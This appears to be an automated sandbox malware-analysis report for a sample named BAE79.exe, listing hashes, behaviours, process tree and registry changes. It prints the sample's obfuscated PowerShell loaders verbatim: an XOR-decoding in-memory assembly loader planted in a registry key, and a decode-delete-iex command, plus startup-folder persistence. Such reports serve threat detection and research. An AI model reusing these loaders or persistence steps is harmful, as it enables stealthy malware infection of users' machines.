5af99cfc85db7d386c951c76581433cf9bf82eafa775daef93d8bde38a5d6afc

General

Target

BAE79.exe
Size

101.7MB
MD5

b73ac38ccf1171d497eb561761a4ec17
SHA1

84e062189b7945cb339e39c5b6815b4704a44b77
SHA256

5af99cfc85db7d386c951c76581433cf9bf82eafa775daef93d8bde38a5d6afc
SHA512

2a5334a9ac83b114d691905793b6ff74ecf821225e2ba9c31181d72e69e2d7a87419ea039222da88dd928ac41da4eab6e17301284f38890395571d4b8f7d6e21

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

15 3368 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

BAE79.tmp

pid process

2760 BAE79.tmp

flow	pid	process
15	3368	powershell.exe

pid	process
2760	BAE79.tmp

Drops startup file 1 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\MIcRoSofT\wINdoWs\sTaRt MeNu\pROgrAms\STArTUP\a40ac898a1f49289886cccab63e2d.lNk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 7 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\twaueofnip\shell\open\command	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\twaueofnip	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\twaueofnip\shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\twaueofnip\shell\open	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\twaueofnip\shell\open\command\ = "PoweRSheLL -WINDoWStYLe HIdDEn -ep bypaSs -CoMmAnd \"$ad35f48fb934fcbc281b4a42816ac='QHJrdjhAdm89OUBxdnx7Xm82cHBeUFF4KkBgUWBLO2tVbD1sOTszTnd4UFQ4djVLfHlmfU0hLWx6QGx2ZnNjWGxwXiZsaGpII21Ycm5hb3x4MHNYaGspXi0la0M+VkFmUj9aR3h2UFducUxoZDhteW48SHY5RmMkbTlMUVRuMmVlOWpsWnopdEd9aTJ1RF9pQHVqQWZAdik/eUB+TmtUQHspfj5AU0s+c0B8QiNMXk8yajVeMEJJP0B7T21QXlEpfDxeT35OQkBgYTAj';$a69cdab156a439980cc4a41bbeb38=[sysTEM.Io.File]::readALlBYTes('C:\\Users\\Admin\\AppData\\Roaming\\MICROSOFt\\UbvakFOfMXZ\\DcWRCMoxwNQTKBpFPUt.twvAygqrUePFnZzKL');FOr($a563419ea854fd8c77d19b8636534=0;$a563419ea854fd8c77d19b8636534 -LT $a69cdab156a439980cc4a41bbeb38.cOunT;){FOr($ab55ca7c9cd4c2a42035d1ef2f665=0;$ab55ca7c9cd4c2a42035d1ef2f665 -lT $ad35f48fb934fcbc281b4a42816ac.lengTh;$ab55ca7c9cd4c2a42035d1ef2f665++){$a69cdab156a439980cc4a41bbeb38[$a563419ea854fd8c77d19b8636534]=$a69cdab156a439980cc4a41bbeb38[$a563419ea854fd8c77d19b8636534] -bXOR $ad35f48fb934fcbc281b4a42816ac[$ab55ca7c9cd4c2a42035d1ef2f665];$a563419ea854fd8c77d19b8636534++;if($a563419ea854fd8c77d19b8636534 -GE $a69cdab156a439980cc4a41bbeb38.CoUnT){$ab55ca7c9cd4c2a42035d1ef2f665=$ad35f48fb934fcbc281b4a42816ac.LeNgth}}};[sYsteM.reflECTiOn.AssEmBLY]::load($a69cdab156a439980cc4a41bbeb38);[MarS.deiMoS]::INTErAcT()\""	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.mjnauwchtrodoelb	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.mjnauwchtrodoelb\ = "twaueofnip"	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3368 powershell.exe
3368 powershell.exe
3368 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 3368 powershell.exe

pid	process
3368	powershell.exe
3368	powershell.exe
3368	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3368	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

BAE79.exeBAE79.tmp

description	pid	process	target process
PID 3728 wrote to memory of 2760	3728	BAE79.exe	BAE79.tmp
PID 3728 wrote to memory of 2760	3728	BAE79.exe	BAE79.tmp
PID 3728 wrote to memory of 2760	3728	BAE79.exe	BAE79.tmp
PID 2760 wrote to memory of 3368	2760	BAE79.tmp	powershell.exe
PID 2760 wrote to memory of 3368	2760	BAE79.tmp	powershell.exe
PID 2760 wrote to memory of 3368	2760	BAE79.tmp	powershell.exe

C:\Users\Admin\AppData\Local\Temp\BAE79.exe
"C:\Users\Admin\AppData\Local\Temp\BAE79.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3728

C:\Users\Admin\AppData\Local\Temp\is-PK0L0.tmp\BAE79.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PK0L0.tmp\BAE79.tmp" /SL5="$201CA,105727480,817152,C:\Users\Admin\AppData\Local\Temp\BAE79.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2760

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$4b975e7c4be776f6140772e559e4cdd6='C:\Users\Admin\eda5b381ff3b4632e4247590e723ee18\0214831a310652d4c93478f724c3c32d\eded229724b6905bb0128860a413b217\fdf4a4558707f2482851d70e62f6328b\f68296e9041749fc650d3051e72e52ca\68eefba2535340ff740c539becef8a4d\d43dcaccc601f5edb84a803159fb53b5';$89657bab3e840c64a5908768f40c9284='diUBsewSVtkHDXyaqTQbYrLNAjmGFIEPxlMWuKhfJoRpvnOczZCg';$e47809232d9e2b170591701fce84b464=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($4b975e7c4be776f6140772e559e4cdd6));remove-item $4b975e7c4be776f6140772e559e4cdd6;for($i=0;$i -lt $e47809232d9e2b170591701fce84b464.count;){for($j=0;$j -lt $89657bab3e840c64a5908768f40c9284.length;$j++){$e47809232d9e2b170591701fce84b464[$i]=$e47809232d9e2b170591701fce84b464[$i] -bxor $89657bab3e840c64a5908768f40c9284[$j];$i++;if($i -ge $e47809232d9e2b170591701fce84b464.count){$j=$89657bab3e840c64a5908768f40c9284.length}}};$e47809232d9e2b170591701fce84b464=[System.Text.Encoding]::UTF8.GetString($e47809232d9e2b170591701fce84b464);iex $e47809232d9e2b170591701fce84b464;"
3⤵
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\is-PK0L0.tmp\BAE79.tmp
MD5
7345a1194982254510d32fade75ac616

SHA1
3d78eb7b18275a826d1d9a0dd85418c40c760caf

SHA256
d40da05d477f2a6a0da575194dd9a693f85440e6b2d08d1687e1415ce0b00df7

SHA512
ac8c2f286eb3b592281cae698d1d5f8767200c40c2e9ee19d6775c0f913374ce37a88b82c12b5e3cc7b214b63f358dcc59a4728f189c50e104b3406c6b8bf70e

Download Submit
C:\Users\Admin\eda5b381ff3b4632e4247590e723ee18\0214831a310652d4c93478f724c3c32d\eded229724b6905bb0128860a413b217\fdf4a4558707f2482851d70e62f6328b\f68296e9041749fc650d3051e72e52ca\68eefba2535340ff740c539becef8a4d\d43dcaccc601f5edb84a803159fb53b5
MD5
12a706d63793e850cbe5a46dd11544f1

SHA1
f84e7857c69317d42727f47e525fa07b09bc777b

SHA256
fb517989808c95b85aeb4c341683939aa871ff81fc24ea9d5e5a2121d6652185

SHA512
ce2b192aaf1a5572ae2e087b8d041208d7ac11a519529496dbbf428b7301d20469294e80cf424b58e08b953e3d9002ec7e9f4d4ec33e88ec90983277c368207a

Download Submit
memory/2760-116-0x0000000000000000-mapping.dmp

Download
memory/2760-118-0x0000000000800000-0x000000000094A000-memory.dmp

Filesize
1.3MB

Download
memory/3368-129-0x0000000007AE0000-0x0000000007AE1000-memory.dmp

Filesize
4KB

Download
memory/3368-130-0x0000000007EF0000-0x0000000007EF1000-memory.dmp

Filesize
4KB

Download
memory/3368-123-0x00000000071F0000-0x00000000071F1000-memory.dmp

Filesize
4KB

Download
memory/3368-125-0x0000000002E32000-0x0000000002E33000-memory.dmp

Filesize
4KB

Download
memory/3368-124-0x0000000002E30000-0x0000000002E31000-memory.dmp

Filesize
4KB

Download
memory/3368-126-0x0000000007050000-0x0000000007051000-memory.dmp

Filesize
4KB

Download
memory/3368-127-0x0000000007820000-0x0000000007821000-memory.dmp

Filesize
4KB

Download
memory/3368-128-0x0000000007A70000-0x0000000007A71000-memory.dmp

Filesize
4KB

Download
memory/3368-1708-0x0000000009550000-0x0000000009558000-memory.dmp

Filesize
32KB

Download
memory/3368-122-0x0000000004A40000-0x0000000004A41000-memory.dmp

Filesize
4KB

Download
memory/3368-131-0x0000000008280000-0x0000000008281000-memory.dmp

Filesize
4KB

Download
memory/3368-132-0x00000000081E0000-0x00000000081E1000-memory.dmp

Filesize
4KB

Download
memory/3368-119-0x0000000000000000-mapping.dmp

Download
memory/3368-138-0x0000000009200000-0x0000000009201000-memory.dmp

Filesize
4KB

Download
memory/3368-139-0x0000000008F40000-0x0000000008F41000-memory.dmp

Filesize
4KB

Download
memory/3368-140-0x0000000008F90000-0x0000000008F91000-memory.dmp

Filesize
4KB

Download
memory/3368-141-0x00000000097A0000-0x00000000097A1000-memory.dmp

Filesize
4KB

Download
memory/3368-148-0x000000000A320000-0x000000000A321000-memory.dmp

Filesize
4KB

Download
memory/3368-273-0x0000000002E33000-0x0000000002E34000-memory.dmp

Filesize
4KB

Download
memory/3728-115-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads